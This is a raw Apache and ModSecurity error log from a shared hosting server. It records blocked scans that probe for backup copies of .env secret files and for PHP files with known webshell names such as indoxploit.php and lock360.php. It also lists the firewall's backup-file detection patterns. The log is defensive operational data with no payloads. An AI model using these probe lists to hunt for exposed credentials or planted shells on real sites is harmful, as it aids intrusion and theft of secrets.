[Tue May 26 13:12:42.419571 2026] [security2:error] [pid 496740:tid 496886] [client 207.241.173.38:44208] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.swp"] [unique_id "ahVO8uvOeft4ltnLrH49bwAAABA"]
[Tue May 26 13:12:42.504607 2026] [security2:error] [pid 496740:tid 496950] [client 207.241.173.38:44144] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.backup"] [unique_id "ahVO8uvOeft4ltnLrH49egAAAFA"]
[Tue May 26 13:12:42.509842 2026] [security2:error] [pid 496740:tid 496992] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVO8uvOeft4ltnLrH49VwAAAHo"]
[Tue May 26 13:12:42.547270 2026] [security2:error] [pid 496740:tid 496965] [client 207.241.173.38:43938] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.local.backup"] [unique_id "ahVO8uvOeft4ltnLrH49fQAAAF8"]
[Tue May 26 13:12:42.614601 2026] [security2:error] [pid 496740:tid 496971] [client 207.241.173.38:43854] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.local.copy"] [unique_id "ahVO8uvOeft4ltnLrH49gQAAAGU"]
[Tue May 26 13:12:42.616734 2026] [security2:error] [pid 496740:tid 496928] [client 108.136.131.13:59008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/images/inputs.php"] [unique_id "ahVO8uvOeft4ltnLrH49gwAAADo"]
[Tue May 26 13:12:42.619170 2026] [security2:error] [pid 496740:tid 496960] [client 108.136.131.13:59011] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/index/function.php"] [unique_id "ahVO8uvOeft4ltnLrH49hgAAAFo"]
[Tue May 26 13:12:42.619526 2026] [security2:error] [pid 496740:tid 496951] [client 108.136.131.13:59012] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/indoxploit.php"] [unique_id "ahVO8uvOeft4ltnLrH49hQAAAFE"]
[Tue May 26 13:12:42.622788 2026] [security2:error] [pid 496740:tid 496939] [client 207.241.173.38:44018] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.production.bak"] [unique_id "ahVO8uvOeft4ltnLrH49iAAAAEU"]
[Tue May 26 13:12:42.622904 2026] [security2:error] [pid 496740:tid 496871] [client 207.241.173.38:44370] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.production.orig"] [unique_id "ahVO8uvOeft4ltnLrH49iQAAAAE"]
[Tue May 26 13:12:42.624867 2026] [security2:error] [pid 496740:tid 496942] [client 207.241.173.38:44364] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.production.swp"] [unique_id "ahVO8uvOeft4ltnLrH49iwAAAEg"]
[Tue May 26 13:12:42.625654 2026] [security2:error] [pid 496740:tid 496967] [client 207.241.173.38:44340] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.production.backup"] [unique_id "ahVO8uvOeft4ltnLrH49jAAAAGE"]
[Tue May 26 13:12:42.627042 2026] [security2:error] [pid 496740:tid 496879] [client 207.241.173.38:44330] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.production.old"] [unique_id "ahVO8uvOeft4ltnLrH49jQAAAAk"]
[Tue May 26 13:12:42.629137 2026] [security2:error] [pid 496740:tid 496974] [client 207.241.173.38:44352] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "mail.besglam.com"] [uri "/.env.production~"] [unique_id "ahVO8uvOeft4ltnLrH49jgAAAGg"]
[Tue May 26 13:12:42.634427 2026] [security2:error] [pid 496740:tid 496975] [client 108.136.131.13:59014] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/info.php"] [unique_id "ahVO8uvOeft4ltnLrH49jwAAAGk"]
[Tue May 26 13:12:44.118164 2026] [autoindex:error] [pid 496740:tid 496905] [client 207.241.173.38:44188] AH01276: Cannot serve directory /home2/besglde8/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:12:44.888420 2026] [security2:error] [pid 496740:tid 496934] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVO9OvOeft4ltnLrH493wAAAEA"]
[Tue May 26 13:12:45.650992 2026] [security2:error] [pid 496740:tid 496993] [client 108.136.131.13:59016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/init.php"] [unique_id "ahVO9evOeft4ltnLrH4-GgAAAHs"]
[Tue May 26 13:12:46.072721 2026] [security2:error] [pid 496740:tid 496971] [client 108.136.131.13:49411] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/install.php"] [unique_id "ahVO9uvOeft4ltnLrH4-LQAAAGU"]
[Tue May 26 13:12:46.082795 2026] [security2:error] [pid 496740:tid 496960] [client 108.136.131.13:49419] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/jindex.php"] [unique_id "ahVO9uvOeft4ltnLrH4-LgAAAFo"]
[Tue May 26 13:12:46.083154 2026] [security2:error] [pid 496740:tid 496951] [client 108.136.131.13:49413] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/j.php"] [unique_id "ahVO9uvOeft4ltnLrH4-LwAAAFE"]
[Tue May 26 13:12:46.090937 2026] [security2:error] [pid 496740:tid 496958] [client 108.136.131.13:49424] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/inputs.php"] [unique_id "ahVO9uvOeft4ltnLrH4-MAAAAFg"]
[Tue May 26 13:12:46.096987 2026] [security2:error] [pid 496740:tid 496931] [client 108.136.131.13:49412] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/iq.php"] [unique_id "ahVO9uvOeft4ltnLrH4-MwAAAD0"]
[Tue May 26 13:12:46.516932 2026] [security2:error] [pid 496740:tid 496890] [client 108.136.131.13:51455] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/kn.php"] [unique_id "ahVO9uvOeft4ltnLrH4-SAAAABQ"]
[Tue May 26 13:12:46.525835 2026] [security2:error] [pid 496740:tid 496928] [client 108.136.131.13:51451] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/js.php"] [unique_id "ahVO9uvOeft4ltnLrH4-SQAAADo"]
[Tue May 26 13:12:46.534606 2026] [security2:error] [pid 496740:tid 496879] [client 108.136.131.13:51452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/k.php"] [unique_id "ahVO9uvOeft4ltnLrH4-SgAAAAk"]
[Tue May 26 13:12:46.536917 2026] [security2:error] [pid 496740:tid 496967] [client 108.136.131.13:51450] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/js.php"] [unique_id "ahVO9uvOeft4ltnLrH4-SwAAAGE"]
[Tue May 26 13:12:46.548115 2026] [security2:error] [pid 496740:tid 496962] [client 108.136.131.13:51453] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/kk.php"] [unique_id "ahVO9uvOeft4ltnLrH4-TAAAAFw"]
[Tue May 26 13:12:46.966824 2026] [security2:error] [pid 496740:tid 496911] [client 108.136.131.13:51789] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/l.php"] [unique_id "ahVO9uvOeft4ltnLrH4-YQAAACk"]
[Tue May 26 13:12:46.970269 2026] [security2:error] [pid 496740:tid 496989] [client 108.136.131.13:51794] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/loader/ff.php"] [unique_id "ahVO9uvOeft4ltnLrH4-ZAAAAHc"]
[Tue May 26 13:12:46.970324 2026] [security2:error] [pid 496740:tid 496875] [client 108.136.131.13:51790] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/leaf.php"] [unique_id "ahVO9uvOeft4ltnLrH4-YwAAAAU"]
[Tue May 26 13:12:46.973023 2026] [security2:error] [pid 496740:tid 496906] [client 108.136.131.13:51793] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/load.php"] [unique_id "ahVO9uvOeft4ltnLrH4-ZQAAACQ"]
[Tue May 26 13:12:46.986915 2026] [security2:error] [pid 496740:tid 496943] [client 108.136.131.13:51792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/lf.php"] [unique_id "ahVO9uvOeft4ltnLrH4-ZgAAAEk"]
[Tue May 26 13:12:47.081007 2026] [access_compat:error] [pid 496740:tid 496944] [client 185.177.72.30:0] AH01797: client denied by server configuration: /home2/samayikp/public_html/includes
[Tue May 26 13:12:47.410062 2026] [security2:error] [pid 496740:tid 496970] [client 108.136.131.13:52558] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/log.php"] [unique_id "ahVO9-vOeft4ltnLrH4-eQAAAGQ"]
[Tue May 26 13:12:47.410504 2026] [security2:error] [pid 496740:tid 496990] [client 108.136.131.13:52556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/lock360.php"] [unique_id "ahVO9-vOeft4ltnLrH4-egAAAHg"]
[Tue May 26 13:12:47.411172 2026] [security2:error] [pid 496740:tid 496961] [client 108.136.131.13:52554] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/local.php"] [unique_id "ahVO9-vOeft4ltnLrH4-ewAAAFs"]
[Tue May 26 13:12:47.416564 2026] [security2:error] [pid 496740:tid 496986] [client 108.136.131.13:52555] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/lock.php"] [unique_id "ahVO9-vOeft4ltnLrH4-fAAAAHQ"]
[Tue May 26 13:12:47.442987 2026] [security2:error] [pid 496740:tid 496972] [client 108.136.131.13:52559] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/login.php"] [unique_id "ahVO9-vOeft4ltnLrH4-fQAAAGY"]
[Tue May 26 13:12:47.761332 2026] [security2:error] [pid 496740:tid 496881] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVO9-vOeft4ltnLrH4-dQAAAAs"]
[Tue May 26 13:12:47.873541 2026] [security2:error] [pid 496740:tid 496930] [client 108.136.131.13:52917] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/lv.php"] [unique_id "ahVO9-vOeft4ltnLrH4-jQAAADw"]
[Tue May 26 13:12:47.877386 2026] [security2:error] [pid 496740:tid 496907] [client 108.136.131.13:52914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/mah.php"] [unique_id "ahVO9-vOeft4ltnLrH4-jgAAACU"]
[Tue May 26 13:12:47.878227 2026] [security2:error] [pid 496740:tid 496973] [client 108.136.131.13:52911] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/m.php"] [unique_id "ahVO9-vOeft4ltnLrH4-kAAAAGc"]
[Tue May 26 13:12:47.880943 2026] [security2:error] [pid 496740:tid 496982] [client 108.136.131.13:52910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/lx.php"] [unique_id "ahVO9-vOeft4ltnLrH4-kQAAAHA"]
[Tue May 26 13:12:47.892206 2026] [security2:error] [pid 496740:tid 496953] [client 108.136.131.13:52912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/mad.php"] [unique_id "ahVO9-vOeft4ltnLrH4-lAAAAFM"]
[Tue May 26 13:12:48.315424 2026] [security2:error] [pid 496740:tid 496870] [client 108.136.131.13:53228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/marijuana.php"] [unique_id "ahVO-OvOeft4ltnLrH4-pAAAAAA"]
[Tue May 26 13:12:48.322661 2026] [security2:error] [pid 496740:tid 496885] [client 108.136.131.13:53227] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/mari.php"] [unique_id "ahVO-OvOeft4ltnLrH4-pQAAAA8"]
[Tue May 26 13:12:48.327646 2026] [security2:error] [pid 496740:tid 496912] [client 108.136.131.13:53225] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/manager.php"] [unique_id "ahVO-OvOeft4ltnLrH4-pgAAACo"]
[Tue May 26 13:12:48.338215 2026] [security2:error] [pid 496740:tid 496964] [client 108.136.131.13:53229] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/mail.php"] [unique_id "ahVO-OvOeft4ltnLrH4-pwAAAF4"]
[Tue May 26 13:12:48.344770 2026] [security2:error] [pid 496740:tid 496908] [client 108.136.131.13:53226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/mar.php"] [unique_id "ahVO-OvOeft4ltnLrH4-qAAAACY"]
[Tue May 26 13:12:48.768751 2026] [security2:error] [pid 496740:tid 496873] [client 108.136.131.13:54074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/mini.php"] [unique_id "ahVO-OvOeft4ltnLrH4-uQAAAAM"]
[Tue May 26 13:12:48.776562 2026] [security2:error] [pid 496740:tid 496874] [client 108.136.131.13:54016] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/MARIJUANA.php"] [unique_id "ahVO-OvOeft4ltnLrH4-ugAAAAQ"]
[Tue May 26 13:12:48.776708 2026] [security2:error] [pid 496740:tid 496937] [client 108.136.131.13:54070] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/mass.php"] [unique_id "ahVO-OvOeft4ltnLrH4-vAAAAEM"]
[Tue May 26 13:12:48.777103 2026] [security2:error] [pid 496740:tid 496957] [client 108.136.131.13:54073] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/min.php"] [unique_id "ahVO-OvOeft4ltnLrH4-vQAAAFc"]
[Tue May 26 13:12:48.777216 2026] [security2:error] [pid 496740:tid 496992] [client 108.136.131.13:54069] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/mas.php"] [unique_id "ahVO-OvOeft4ltnLrH4-uwAAAHo"]
[Tue May 26 13:12:48.809136 2026] [proxy:error] [pid 496740:tid 496882] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:12:48.809208 2026] [proxy_http:error] [pid 496740:tid 496882] [client 147.185.132.70:60954] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:12:48.809910 2026] [proxy:error] [pid 496740:tid 496882] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:12:48.809956 2026] [proxy_http:error] [pid 496740:tid 496882] [client 147.185.132.70:60954] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:12:49.219760 2026] [security2:error] [pid 496740:tid 496953] [client 108.136.131.13:54568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/mrjn.php"] [unique_id "ahVO-evOeft4ltnLrH4-zgAAAFM"]
[Tue May 26 13:12:49.220608 2026] [security2:error] [pid 496740:tid 496960] [client 108.136.131.13:54601] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/n.php"] [unique_id "ahVO-evOeft4ltnLrH4-zwAAAFo"]
[Tue May 26 13:12:49.220925 2026] [security2:error] [pid 496740:tid 496915] [client 108.136.131.13:54600] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.131.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "agsnails.com"] [uri "/new.php"] [unique_id "ahVO-evOeft4ltnLrH4-0AAAAC0"]
